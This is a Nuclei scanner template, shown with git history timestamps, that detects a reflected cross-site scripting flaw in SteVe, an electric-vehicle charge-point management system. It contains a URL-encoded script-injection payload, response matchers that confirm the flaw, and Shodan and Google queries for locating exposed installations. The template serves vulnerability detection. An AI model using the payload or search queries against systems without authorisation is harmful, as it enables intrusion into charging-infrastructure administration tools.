nuclei-templates/vulnerabilities/other/steve-xss.yaml

39 lines
1.0 KiB
YAML
Raw Normal View History

2022-10-26 16:59:39 +00:00
id: steve-xss
2022-10-26 16:09:38 +00:00
info:
2022-10-26 16:59:39 +00:00
name: SteVe - Cross-Site Scripting
2022-10-26 16:09:38 +00:00
author: clem9669
severity: medium
2022-10-26 16:59:39 +00:00
description: |
The aim of SteVe is to support the deployment and popularity of electric mobility. SteVe provides basic functions for the administration of charge points.
2022-10-26 16:09:38 +00:00
reference:
- https://github.com/steve-community/steve
metadata:
2022-10-26 16:59:39 +00:00
verified: true
2022-10-26 16:09:38 +00:00
shodan-query: http.title:"SteVe - Steckdosenverwaltung"
google-query: intitle:"SteVe - Steckdosenverwaltung"
2022-10-26 16:59:39 +00:00
tags: steve,xss
2022-10-26 16:09:38 +00:00
requests:
- method: GET
path:
- '{{BaseURL}}/steve/services/"%3E%3Cscript%3Ealert(document.domain)%3C/script%3E/services/'
- '{{BaseURL}}/services/"%3E%3Cscript%3Ealert(document.domain)%3C/script%3E/services/'
2022-10-26 16:59:39 +00:00
2022-10-26 16:09:38 +00:00
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
2022-10-26 16:59:39 +00:00
part: body
2022-10-26 16:09:38 +00:00
words:
2022-10-26 16:59:39 +00:00
- '<script>alert(document.domain)</script>/services/?stylesheet=1">'
2022-10-26 16:09:38 +00:00
- type: word
2022-10-26 16:59:39 +00:00
part: header
2022-10-26 16:09:38 +00:00
words:
- "text/html"
2022-10-26 16:59:39 +00:00
- type: status
status:
- 200